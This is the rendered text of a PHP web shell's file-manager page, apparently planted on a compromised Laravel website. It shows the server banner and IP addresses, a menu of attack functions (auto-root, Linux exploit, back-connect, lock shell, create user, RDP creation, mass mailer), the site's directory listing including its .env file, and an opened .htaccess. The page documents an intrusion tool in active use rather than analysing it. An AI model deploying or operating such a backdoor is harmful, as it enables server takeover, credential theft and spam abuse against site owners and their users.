Linux webserver.lcwhost.net 5.10.0-12-amd64 #1 SMP Debian 5.10.103-1 (2022-03-07) x86_64
LiteSpeed
: 194.163.130.72 | : 216.73.216.224
Cant Read [ /etc/named.conf ]
7.4.33
admin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
admin /
domains /
sm.lcwhost.net /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-r--r--
.env
1.25
KB
-rw-r--r--
.gitattributes
186
B
-rw-r--r--
.gitignore
278
B
-rw-r--r--
.htaccess
759
B
-rw-r--r--
README.md
4.01
KB
-rw-r--r--
artisan
350
B
-rw-r--r--
composer.json
4
KB
-rw-r--r--
composer.lock
522.74
KB
-rw-r--r--
index.php
582
B
-rw-r--r--
package-lock.json
117.88
KB
-rw-r--r--
package.json
982
B
-rw-r--r--
php
0
B
-rw-r--r--
phpunit.xml
1.16
KB
-rw-r--r--
postcss.config.js
91
B
-rw-r--r--
vite.config.js
2.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<IfModule mod_rewrite.c> RewriteEngine On Options -MultiViews -Indexes <FilesMatch "^\.(env|env\.example|git|gitattributes|gitignore|htaccess|htpasswd|ini|log|md|sql|sh|lock)$"> Require all denied </FilesMatch> RewriteRule ^(\.env|composer\.(json|lock)|package(-lock)?\.json|yarn\.lock)$ - [F,L] RewriteRule ^(vendor|node_modules)/ - [F,L] <IfModule mod_dir.c> DirectorySlash Off </IfModule> RewriteRule ^installer$ installer/index.php [L,QSA] RewriteRule ^installer/?$ installer/index.php [L,QSA] RewriteRule ^installer/(.*)$ installer/index.php [L,QSA] RewriteCond %{REQUEST_FILENAME} -f [OR] RewriteCond %{REQUEST_FILENAME} -d RewriteRule ^ - [L] RewriteRule ^ index.php [L,QSA] </IfModule>
Close